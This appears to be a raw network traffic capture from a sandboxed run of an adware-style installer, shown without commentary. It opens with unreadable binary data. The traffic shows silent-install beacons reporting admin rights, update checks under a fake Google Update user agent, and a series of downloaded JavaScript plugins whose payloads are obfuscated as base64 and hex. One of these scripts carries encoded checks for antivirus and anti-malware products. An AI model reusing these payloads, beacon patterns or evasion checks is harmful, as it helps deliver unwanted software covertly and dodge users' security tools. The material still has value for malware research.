..K."..N1!%..S.bT.H.-.....e..`.0$...0t..DX..{.....#./...8.5..M...T.......D......V\C.zy.....3E:..>.{..).QW......q....9..n..1....8%,.........r.p@.>. ...Q.?.p..7.?..7...&..!.........`. .=....Sf..q.l.A.....L...t.}g..;...f....=.e.~.z....C..*R....H-..=...f..(t'.."....F...g._....n.J..U.4vr`}.....1..o@.....@.#...R. L8....z..].|......3..y..-./....K..6{...s.<R`.}6....?.......-..@.g..S....
<<< skipped >>>
GET /omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098&w=3:uxP7lqHPgjR31A1VCO5ingXndb1rFK_KAHySpOeS13mFOEtsynLmgcq7I6NOZRbf7J9PCORCxJAYvLQBx2b-1W8C0I5TnOv5uontBSViwgQRQhARK-F_MdynNh4BLVWmYQSh2YIjyRn92lVEe91SjRxOzYFYrMl6EX22_Crgr2Q HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp;cup
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
If-Match: "BRHtvIFHcNUSomdLAnWeH6iI1SQ"
Host: update.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1399811332"
Last-Modified: Sun, 11 May 2014 12:28:52 GMT
Cache-Control: max-age=21600
Content-Length: 403
Content-Type: text/xml; charset=UTF-8
X-HW: 1413862436.dop017.am4.t,1413862437.cds067.am4.s,1413862436.dop001.se1.r,1413862436.cds019.se1.p,1413862437.cds067.am4.p
<?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56508"/>. <app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">. <updatecheck status="noupdate"/>. <ping status="ok"/>. </app>. <app appid="{b13cb685-2858-4509-bb2e-34e3545b73f9}" status="ok">. <updatecheck status="noupdate"/>. <ping status="ok"/>. </app>.</response>.....
GET /omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098 HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp
X-Last-HR: 0x80040881
X-Last-HTTP-Status-Code: 200
X-Retry-Count: 0
Host: update.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1399811332"
Last-Modified: Sun, 11 May 2014 12:28:52 GMT
Cache-Control: max-age=21600
Content-Length: 403
Content-Type: text/xml; charset=UTF-8
X-HW: 1413862436.dop017.am4.t,1413862437.cds067.am4.c
<?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56508"/>. <app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">. <updatecheck status="noupdate"/>. <ping status="ok"/>. </app>. <app appid="{b13cb685-2858-4509-bb2e-34e3545b73f9}" status="ok">. <updatecheck status="noupdate"/>. <ping status="ok"/>. </app>.</response>...
GET /installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=0&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1413862412&procruntime=10&rnd=1413862422 HTTP/1.1
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: iWgZhMz61hH/abToeYxoWIIfOlw 1rP1wEWRnHmzYuJ7751g9oDM0KlFWLStwYTM
x-amz-request-id: B896F103AC0DE8FA
Date: Tue, 21 Oct 2014 03:33:43 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1413862412&procruntime=30&rnd=1413862442 HTTP/1.1
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ANu wI9oJQ8 gzBNohUzdmuUThDrmHvL3uEQGuiVJFnmiGB1Qf6E3dMGaC2mixIL
x-amz-request-id: 00FF35758F9B059E
Date: Tue, 21 Oct 2014 03:34:03 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&installtime=1413862412&curtime=1413862412&lifetime=0&silent=1&procstarttime=1413862412&procruntime=30&rnd=1413862442 HTTP/1.1
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: oQ1YkHy5hkWQABIFmdoyLL4OO1kXa04na2FBbZght FjWo3f2 kzB0GF/3vcwBT
x-amz-request-id: 9EBE31A8291AC950
Date: Tue, 21 Oct 2014 03:34:03 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Feb 2014 23:56:30 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
GET /plugins/mins/275.js?ver=3&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405263879"
Last-Modified: Sun, 13 Jul 2014 15:04:39 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
if (typeof setup2 === 'function') { setup2('MDg2MzcwNGUwNDA1MTExYTM2MDExZjRiNDM0YzRlMTkxMTFlMTM0OTVjNDYwZTFmNDIwMTE3MDMwMDE2MTcwYzBkMDkwZjA1NGIwOTBjMWU1YzFhNTYxYzA4MWIxNjVmNTA0YTRiNWIxODVmNWM0MDUzMDg1NDExNWQwMzBhNTMxZjE4MDE1NzNjMmMzMDNiMzYzZjNmMjMyYzJlMjYyMTJjMmMyMTM4MjkzZjIxMmYyNzJjMjAzYzNiMzMyNTM1M2EzNTQ1MTIwMzE5MTcwZDAxMTQ1ODM1M2MzMDIxMjYyYTNmM2UzODIxMmYzMTJjMzIzOTI5MzMyMjMwMjgyZjNjMmM1MTQ1NzM2NTRlMTkxMTFlMTMwMDI2MWIxNTRlNTY1MTQ3MDIxNzA3MDMxYTQzNDM0MzA2MTY0NDEzMDExYTBhMWMwODA5MDUwMDA5MTc1ZDEwMDYxNDQzMWY1ZTE1MGUwOTAwNDY1YTQwNTQ1ZTEwNTY1YTUyNDUxMTVlMWI0MjA2MDI1YTE5MGExNzRlMzYyNjJmM2UzZTM2MzkzMTNhMzcyYzJiMzMyOTI5MzEyZjJkMzczNjJkMjYzZjM5MzMzYTIzMjcyYzJjNGYxODFjMWMxZjA0MDcwNjRlMmMzNjNhM2UyMzIyMzYzODJhMzczNjNiMjYyZDNjMjEzYTI0MjIzZTM2MzYyNjRlNDA3YjZjNDgxMzFmMDYwZTEwMDIyNTE1NDc1MDQzNDE0NDVjNzMxMQ==', 'siyllqejcs'); }....
GET /plugins/mins/289.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1413821196"
Last-Modified: Mon, 20 Oct 2014 16:06:36 GMT
Cache-Control: max-age=152
Content-Length: 903
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
if (typeof setup2 === 'function') { setup2('MGM3YjQ3NGQ0NTQ2NDMwOTFmMGMwNzI0MTUwMTQ3NWM0MTQzMDMwYzAzMDE1ZDQyNGEwNzRmMTkwZDBhMTIxNDE0MDgxNzEwMDgwMjBlNTYxNDFlMGE0MjE1MDcxMzE1MDUxZDA1NWUwYTA0MDk1NDM3NTEzYzBiNTg0ZTA0MDQwMTViNTA1ODRkMGIxZTE1NWEzMjNhMjUzMzJlMzgyYjI1MzgyMzI4MzczOTI0MzkzZjNkMzkzNTIyMjkzYTM1MzQyMzM0MzEzMzJlMzg0YjA0MDIwNTIyMjk0NTQ2NTcwNjFkMTUxMjA4MTUwNzFkNGEyZTM4MmUzNzI5MzIzMjM5MzEzMzM0MzUzMjI0MzYzMTNlMjUzOTNhMzQzODMyNDc0YTZiNDE0YjU4NTc1MzBmMTkxMTE2MTIzNDE5MTQ1NTRiNDc0ZjBkMTIxNTExMTg0MjU4NWUwNjQzMWQwMDEzMDQwZTBiMTIwMzExMDQwNjAzNGYwMjA0MTU1ODAxMDYxZjExMDgwNDEzNDQxNTFlMWQ1NTNiNTUzMTEyNGU1NDFiMWUxNTVhNWM1YzQwMTIwODBmNDUyODJlMjQzZjJhMzUzMjMzMjIzYzMyMjMzODI4M2QzMjI0MmYyZjNkMzMyZTM0MzgyNzM5MjgyNTM0Mjc1MTEwMDMwOTI2MjQ1YzUwNGQxOTA3MDExMzA0MTEwYTA0NWMzNDI3MzQyMzI4M2UzNjM0MjgyNTJlMmEyODMwMzczZDNhMjgyMDJjMmUyNzI4NTM0YjY3NDU0NjQxNDE0OTA4MWIwNDAwMDQwYjJmMDU0MzUxNTg0NTQ5NWU2NzE4', 'wqgmefaakx'); }....
GET /plugins/mins/260.js?ver=4&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405263875"
Last-Modified: Sun, 13 Jul 2014 15:04:35 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds046.am4.c
if (typeof setup2 === 'function') { setup2('MGI3MDdiNTQwZDAwMTYxZjNkMWYxYzU4NDg1NjQ3MWMxNjFiMTg1NzVmNTUwNTA1NGIwNDEwMDYwYjA4MTQxZjA2MTMwNjAwNGMwYzA3MDA1ZjA5NWQwNjAxMWUxMTVhNWI1YjQyNGIxMzQ2NTM0NTU1MGI1YjA5NWUxMDAxNDkxNjFkMDY1MjM3MzIzMzI4M2QyNTM2MjYyYjJiMmQzZjJmM2YyYTIyMjAzYTI2MmEyYzMyMjMyZjMwMjkyYzMwM2QzMDRlMGMwMDBhMWMxNzA4MTE1ZjMwMzcyZTIyMzUyMTI1MzczZDI2MmEzYTMyMzEyYTIyMjkyYjM1MmYyYTM3MzI1MjU2Nzg3ZjQ3MWMxNjFiMTgxZTI1MDgxZTU0NWY1NDQwMDcxYzE5MDAwOTQ4NTk0YTAzMTE0MTE4MWYxOTE5MTcxMjAwMDAwNzBjMWM0MzEzMTUxZjU5MTY1YjEyMGIwMjFlNDU0OTQ0NDQ1NDE1NTI1OTU5NWExNDQ5MTY1ODBmMDc1ZDFjMDEwOTRkMjUyZDM1MzczYjMxM2MzYTI0MzQzZjIwMjkyMDJjMzYyYTI2MjkzNTNlMmQyNTMwMzYzZDI2MmMzMjJmNWMxMzA2MTUxYTAzMDIwZDUwMmYyNTMxMjQyYTI3MzEzZDIxMjkzNTI4MmQzNzM1MjQzZDIxMjkyMDM1MjUyZDU0NDk3ZTZiNGQxODAxMDUxZDFiMTgyYzEwNDA1NTQ4NWY0NjRhNzgwYg==', 'pzrvetbohm'); }....
GET /plugins/mins/244.js?ver=5&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405263865"
Last-Modified: Sun, 13 Jul 2014 15:04:25 GMT
Cache-Control: max-age=900
Content-Length: 1103
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c
if (typeof setup2 === 'function') { setup2('MGY2NDdlNTcxZTFhMGMxMzJmMDAxODRjNGQ1NTU0MDYwYzE3MGE0ODViNDExMjBkMDI1YzU2MDYxNDE1MTUwOTEyMGMxNzQwMWIwYzE3NWQwMzA3MTMxMjEzMWE1NzBhMTQxODExMGQwMzJhMDUxZTE5MTExMTVkMWQwMDFkMmEwNTFlMGEwODI1MDEwMDBmMDUwMTEzMWM1NjA5MDk0ZDA0MDcxMzQ4M2EzYTNkMTAzNTM2MzU1ZjM4MzEyNzFkMzUwOTFkNDEzOTA0M2UwNjM4MmExYjU3MzUyNjM1NGI0NDMxNTAxZDBkMDExMzE2NDkzMTI4MzYyNDIxMmIzMDI4M2IzMDJiMjUyYTMzMzYyYzI2MzQzNjMxMmEyODI2MjMyYzI3MmEzZTJkMmI0ODE2MDUwNjAwMTkwZTFmNGYyYjMxMzQyNzM5M2QyYjMxMzMzNjMxM2MyODM0MjYzZTI3MmQzYjNmMzEzMTI4NTc1YTY0NzE0MTEyMDYwMDFlMDQyMDA0MDI1YTU5NWE1MDFjMWEwMzA1MDU1NDU3NGMxZjBhMDA1YzU5MTAxODA5MTkwNDFmMGIxNTQwMTQxYTFiNDEwZjBhMWUxNTExMWE1ODFjMTgwNDFkMDAwZTJkMDcxZTE2MDcxZDQxMTEwZDEwMmQwNzFlMDUxZTI5MWQwYzAyMDgwNjExMWM1OTFmMDU1MTA4MGExZTRmMzgzYTMyMDYzOTJhMzk1MjM1MzYyNTFkM2ExZjExNWQzNTA5MzMwMTNhMmExNDQxMzkzYTM5NDY0OTM2NTIxZDAyMTcxZjBhNDUzYzI1MzEyNjIxMjQyNjI0MjczYzI2MjgyZDMxMzYyMzMwMzgyYTNkMjcyNTIxMjEyYzI4M2MzMjMxMjc0NTFiMDIwNDAwMTYxODEzNTMyNzNjMzkyMDNiM2QyNDI3M2YyYTNkMzEyNTMzMjQzZTI4M2IzNzIzM2QzYzI1NTA1ODY0N2U1NzA2MDIwZDA0MTMxYzNkMGE1NTRmNTY1YzRjNTc3MDBm', 'tnwuvnxczr'); }....
GET /plugins/mins/242.js?ver=4&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1403211500"
Last-Modified: Thu, 19 Jun 2014 20:58:20 GMT
Cache-Control: max-age=900
Content-Length: 1023
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c
if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }....
GET /plugins/mins/230.js?ver=7&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273144"
Last-Modified: Sun, 17 Aug 2014 10:59:04 GMT
Cache-Control: max-age=900
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c
if (typeof setup2 === 'function') { setup2('MDM3YzY3NDMwMDFlMWUwODNkMWYxNDU0NTQ0MTRhMDIxZTBjMTg1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDA2MTUxYzFhMTkyZDFhMDE1YTRjNGU0MzAwMWUxZTA4MWI1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDFlMGQxZDBkMDMxNjIxMDk1YTRjNGU1MzViNWE0NjcyNDg0ZDU4NTY0YzE3MGQxODFlMTEwYjBjMTQ1NDU0NDEzMzQ4MGIxYzFiNGYyNTVhNjQ0MTQ4NGE0YTVhMDEwMzE0MWYwMDA0MjIzOTQ4NDI0ODRmMGYxZjAwMDUwNzFkNDQyNzFhMWIwMjQ3NTk1MTU4MTI1YjQ4NWM1YjU4NGI0ZTFhNDg0ZDFhMGQwYTAxMTEwNTA2MDQxYTM1MTkwZDBhMDQxYzUxNTQ0MTRmMzUzNTNiM2EyMjJiMjUzYzI4MmMyZjM4MjcyZDM1MmMzMzIwMjUyZDJlMzUyYjNkMmYyNzNmMmEzZTM3NGQ0NjU4NGYwYzFjMTIwMTBmMDYwYjA3MWQ0ZjU3NTg1MTMxM2UyYjM4MjUyYjNiM2YzMTMyMmIzMzM3MmIzYTI4MzcyMzM5M2IyYjNlMzc0ZDE3NDM0YTY3MDU=', 'xvnahjjxhm'); }....
GET /plugins/mins/223.js?ver=8&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1404137812"
Last-Modified: Mon, 30 Jun 2014 14:16:52 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds068.am4.c
if (typeof setup2 === 'function') { setup2('MGQ2NjY1NWExMjBjMTUxZTJkMTgxYTRlNTY1ODU4MTAxNTFhMDg1MDU5NDMwZjFjMTQ1NjE3MDcwYjBiMTIwODQyMWIxNTE1NGUxZDFiMTgxZjFjMTg1NzRiNGM1NDU4NGY1ZDQ0NTk1YjRlNGY1NzExMWMxZDA2MTkwZDA4NTYxMDBiNWUxZDBkMDgxZjA4NTEyNzI1M2IzMzIxMmIzOTI0MjUyODNkMjgyNzI0MzYyYzJmMzgyODI5M2MyNTJiMzQyYzI3MjMzMjMzMzM1ZTBmMTU1YzMxMjcyOTI0MjMzZjJiMjgzMTI1MmIyYTM1MzczYzNjMjczNDM5MmMyYjI3MzU1NDQwNjY3MTU4MTAxNTFhMDgxOTIzMWUwMDVhNDA1ODQzMDYwYzFlMDYxZjU2NTc1NTFiMDUwMDU2MWMxZjFmMGQxYzFlNTYwMjAxMTU0NTA1MGYxZTExMGEwYzRlNWY0YzVmNDA1YjViNGE0ZjRmNTc1YjU3MWEwNDA5MDAxNzFiMWM0ZjA0MGI1NTA1MTkwZTExMWU0NTNlMzEzYjM4MzkzZjNmMmEzMzNjMjQzYzI3MmYyZTM4MjkzNjNlM2QyNTMxMmIzZjM0MzMyNTNjMjUyNzQ3MWIxNTU3MjkzMzJmMmEzNTJiMzIzYzMxMmUzMzNlMzMzOTJhMjgzZTIwMzkyNzMzMzMzMzVhNTY3MjY4NGMwODA2MDMwYjA1MTYzMzFjNDM1NDU4NTg0NDVmNjYwNQ==', 'vllxzxanxj'); }....
GET /plugins/mins/211.js?ver=7&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273147"
Last-Modified: Sun, 17 Aug 2014 10:59:07 GMT
Cache-Control: max-age=64
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds041.am4.c
if (typeof setup2 === 'function') { setup2('MTk2ZjcxNDYwZTFjMGUwMjIyMDgwZTQ3NDI0NDQ0MDAwZTA2MDc0MDRkNGExOTE3MTQxZTU3MTM1OTFiMDkwNDE1MDUwZjAwMWU1YzE5MWYxNjRhMGIwMDQ5NTk0ZDQyNDc1NTUzNTU0YzUxNDgwMjA5NTA1YjcwNmI0NzEwMTAxMjE4MDkyNzA1MTY0MDVmNTg0NjBlMWMwZTAyMDQ0MDRkNGExOTE3MTQxZTU3MTM1OTFiMDkwNDE1MDUwZjAwMWU1YzE5MWYxNjRhMGIwMDQ5NTk0ZDQyNDc1NTUzNTU0YzUxNDgwMjA5NTA1YjcwNmI0NzA4MDgxMzBmMTMxYzNlMWU0MDVmNTg1NjU3NTk1Njc4NTc1YTQyNDU1YTEyMDMxYTBlMWIxNDFiMGU0NzQyNDQzZDRhMWIxNjA0NTgzZjQ5NzI0NDQ2NDg1YTUwMWUxNDBlMGMxNjAxMmMzYjU4NDg1NzU4MTUwYzE2MDAwOTFmNTQyZDA1MGMxODU0NGY1NDU2MTA0YjQyNDM0ZjQyNTg1ODFmNDY0ZjBhMDcxNTE2MGIxNjEwMDExNDM3MDkwNzE1MTMwNjQyNDI0NDQxMzcyNTMxMjUzNTMxMzYyYTJkMjIyZDI4MmQzMjIyMzYyMDM2MjAyMzJjMjUyMTIyMzgzZDJjM2MzYjM5NGY1NjUyNTAxYjA2MDExNzBhMDgwOTE3MTc1MDQwNDI0MjI3M2IyNTNhMzUyMTI0MjgyYjIxM2QzNjM5MjkyYTIyMjgzNDIzMjgzZDNiMzk0ZjA3NDk1NTcwMWY=', 'bexdfhzrwz'); }....
GET /plugins/mins/220.js?ver=23&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1413711006"
Last-Modified: Sun, 19 Oct 2014 09:30:06 GMT
Cache-Control: max-age=633
Content-Length: 33490
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds041.am4.c
if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(g){var i=(function(){var u={"\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1,"\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2,"\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4,"\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8,"\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":16,"\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64":32,"\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64":64,"\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64":128,"\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64":256,"\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":512,"\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1024,"\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2048,"\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4096,"\x73\x70\x61\x72\x6B\x5F\x62\x61\x69\x64\x75\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8192,"\x62\x32\x63\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\x74\x65\x64":16384,"\x63\x72\x6F\x73\x73\x72\x69\x64\x65\x72\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\x74\x65\x64":32768,"\x79\x6F\x6E\x74\x6F\x6F\x5F\x64\x65\x74\x65\x63\x74\x65\x64":65536,"\x61\x76\x67\x5F\x73\x61\x66\x65\x67\x75\x61\x72\x64\x5F\x64\x65\x74\x65\x63\x74\x65\x64":131072,"\x67\x65\x65\x6B\x5F\x62\x75\
<<< skipped >>>
GET /plugins/mins/184.js?ver=10&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1403604769"
Last-Modified: Tue, 24 Jun 2014 10:12:49 GMT
Cache-Control: max-age=587
Content-Length: 1239
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c
